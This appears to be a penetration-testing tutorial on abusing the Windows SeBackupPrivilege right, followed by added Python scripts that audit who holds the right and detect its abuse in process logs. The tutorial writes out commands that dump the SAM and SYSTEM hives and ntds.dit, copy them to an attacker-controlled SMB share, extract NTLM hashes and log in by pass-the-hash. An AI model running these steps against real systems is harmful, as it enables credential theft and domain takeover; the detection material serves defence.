SeBackupPrivilege
Last updated
SeBackupPrivilege lets its holder read files and registry hives that the ACLs would normally deny them, because the backup right bypasses read-access checks.
Using robocopy we can copy such files under the pretext of making a backup.
For example, we would have access to every folder inside the Administrator's desktop folder.
What can we do with that?
We can create a new directory and drop copies of the SAM, SYSTEM and SECURITY hives into it.
On a domain controller we can go further: we start our own SMB server with smbserver.py from Impacket and run the following commands on the target to pull ntds.dit.
echo "Y" | wbadmin start backup -backuptarget:\\<our-ip>\<our-share> -include:c:\windows\ntds
wbadmin get versions
The output lists the backup versions with their version identifiers (in the form MM/DD/YYYY-HH:MM); note the identifier of the backup just taken and use it in the next command.
echo "Y" | wbadmin start recovery -version:<version-identifier> -itemtype:file -items:C:\windows\ntds\ntds.dit -recoverytarget:C:\ -norestoreacl
reg save HKLM\SYSTEM c:\system.hive
cp ntds.dit \\<our-ip>\<our-share>\ntds.dit
cp system.hive \\<our-ip>\<our-share>\system.hive
Then, on our own machine, we go to the directory backing the share and extract the hashes offline:
secretsdump.py -ntds ntds.dit -system system.hive LOCAL
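Before hunting for the commands above, a defender wants to know which principals hold the right at all: by default only Administrators and Backup Operators do. The Python script below is an added example, not part of the original page. It parses the [Privilege Rights] section of a `secedit /export /cfg <file>` policy dump and reports every SeBackupPrivilege holder outside those two built-in groups. The policy excerpt and the S-1-5-21-... SID in it are constructed for the example.

```python
import re
from typing import Dict, List, Set

# Well-known SIDs of the groups that hold SeBackupPrivilege by default:
# BUILTIN\Administrators and BUILTIN\Backup Operators.
DEFAULT_HOLDERS: Set[str] = {"S-1-5-32-544", "S-1-5-32-551"}

WELL_KNOWN_NAMES: Dict[str, str] = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-551": "BUILTIN\\Backup Operators",
    "S-1-5-32-549": "BUILTIN\\Server Operators",
}

# Constructed excerpt of a `secedit /export /cfg policy.inf` file. The
# S-1-5-21-... value is a made-up domain SID standing in for a custom group
# that someone granted the backup right to.
SAMPLE_EXPORT = """[Unicode]
Unicode=yes
[Privilege Rights]
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-21-1111111111-2222222222-3333333333-1105
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551
SeDebugPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(inf_text: str) -> Dict[str, List[str]]:
    """Return {privilege name: [holder, ...]} from the [Privilege Rights] section.

    secedit writes holders as comma-separated SIDs prefixed with '*'; the
    prefix is stripped so the values compare directly against DEFAULT_HOLDERS.
    """
    rights: Dict[str, List[str]] = {}
    in_section = False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("["):
            # Section header: track whether we are inside [Privilege Rights].
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        holders = [h.strip().lstrip("*") for h in value.split(",") if h.strip()]
        rights[name.strip()] = holders
    return rights


def unexpected_backup_holders(inf_text: str,
                              allowed: Set[str] = DEFAULT_HOLDERS) -> List[str]:
    """List SeBackupPrivilege holders that are not in the allowed set."""
    holders = parse_privilege_rights(inf_text).get("SeBackupPrivilege", [])
    return [WELL_KNOWN_NAMES.get(h, h) for h in holders if h not in allowed]


if __name__ == "__main__":
    for holder in unexpected_backup_holders(SAMPLE_EXPORT):
        print("SeBackupPrivilege granted outside the default groups:", holder)
```

On a real host, secedit writes the export as UTF-16, so read it with `open(path, encoding="utf-16")` before passing the text in; anything the script reports is a principal that can read SAM, SYSTEM and ntds.dit regardless of their ACLs and should be justified or removed.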
Now we can start exploiting this privilege. As discussed earlier, it lets the user read every file on the system, and we will use that to our advantage. First we move to the C:\ directory and create a Temp directory (an attacker trying to stay quiet could instead use any directory where they already have read and write access). Then we change into Temp and use SeBackupPrivilege, through reg save, to write a copy of the SAM hive, and likewise a copy of the SYSTEM hive.
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
Our Temp directory now holds a SAM file and a SYSTEM file. Using the Evil-WinRM download command, we transfer both from the Temp directory on the target to our Kali Linux machine.
cd Temp
download sam
download system
Now we can extract the hive secrets from the SAM and SYSTEM files with pypykatz. If it is not present on your Kali Linux, you can install it from its GitHub repository; it is a variant of Mimikatz written in Python. We run its registry function and pass the path to the SAM file with the --sam parameter, followed by the SYSTEM file. As soon as the command runs, we can see in the demonstration below that we have extracted the NTLM hashes of the Administrator account and of the other users as well.
pypykatz registry --sam sam system
Now we can use the NTLM hash of the raj user to access the target machine as raj, again through Evil-WinRM (pass-the-hash). After connecting, we run net user to confirm that raj is a member of the Administrators group, which means we have escalated privileges from our initial shell as the aarti user.
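Both procedures on this page, the wbadmin backup and recovery of ntds.dit earlier and the reg save of the SAM and SYSTEM hives just shown, leave distinctive command lines in process-creation telemetry (Security event 4688 with command-line auditing enabled, or Sysmon event 1). The Python script below is an added example, not part of the original page: it runs a small rule set over constructed process-creation records and reports which user issued which suspicious command, while letting a routine full backup to a local drive pass. The user names, the 10.10.14.5 address and the version identifier in the sample records are made up.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed process-creation records in the shape a SIEM keeps from
# Security event 4688 or Sysmon event 1 (subject user and command line).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"user": "LAB\\aarti", "cmdline": "reg save hklm\\sam c:\\Temp\\sam"},
    {"user": "LAB\\aarti", "cmdline": "reg save hklm\\system c:\\Temp\\system"},
    {"user": "LAB\\svc_backup",
     "cmdline": "wbadmin start backup -backuptarget:\\\\10.10.14.5\\share "
                "-include:c:\\windows\\ntds"},
    {"user": "LAB\\svc_backup",
     "cmdline": "wbadmin start recovery -version:01/02/2023-10:30 -itemtype:file "
                "-items:C:\\windows\\ntds\\ntds.dit -recoverytarget:C:\\ -norestoreacl"},
    # A scheduled full backup to a local drive: same tool, benign usage.
    {"user": "LAB\\svc_backup",
     "cmdline": "wbadmin start backup -backuptarget:E: -include:C:\\ -allCritical -quiet"},
    {"user": "LAB\\jsmith",
     "cmdline": "reg query hklm\\software\\microsoft\\windows\\currentversion\\run"},
]

# Each rule is (finding title, compiled pattern matched against the command line).
RULES = [
    ("reg save of the SAM, SECURITY or SYSTEM hive",
     re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|security|system)\b", re.I)),
    ("wbadmin backup that includes the NTDS directory",
     re.compile(r"\bwbadmin(?:\.exe)?\s+start\s+backup\b.*-include:\S*\\ntds\b", re.I)),
    ("wbadmin backup written to a network share",
     re.compile(r"\bwbadmin(?:\.exe)?\s+start\s+backup\b.*-backuptarget:\\\\", re.I)),
    ("wbadmin recovery of ntds.dit with ACL restore disabled",
     re.compile(r"\bwbadmin(?:\.exe)?\s+start\s+recovery\b.*ntds\.dit.*-norestoreacl\b", re.I)),
]


def detect_backup_abuse(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (user, finding title) for every rule that matches an event's command line.

    One event can trigger several rules, e.g. a backup of NTDS that also
    targets a network share, and each match is reported separately.
    """
    findings: List[Tuple[str, str]] = []
    for event in events:
        for title, pattern in RULES:
            if pattern.search(event["cmdline"]):
                findings.append((event["user"], title))
    return findings


def summarize(findings: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Group finding titles by the user that issued the command."""
    by_user: Dict[str, List[str]] = defaultdict(list)
    for user, title in findings:
        by_user[user].append(title)
    return dict(by_user)


if __name__ == "__main__":
    for user, titles in summarize(detect_backup_abuse(SAMPLE_EVENTS)).items():
        print(user)
        for title in titles:
            print("  -", title)
```

The rules key on what the technique needs rather than on a tool name alone: a hive save of SAM, SECURITY or SYSTEM, a backup that includes the NTDS directory or goes to a UNC path, and a recovery of ntds.dit with -norestoreacl. Correlating a hit with the account's group membership (a non-admin that was just added to Backup Operators) and with the 4672 logon event that granted SeBackupPrivilege turns it from a single alert into a case.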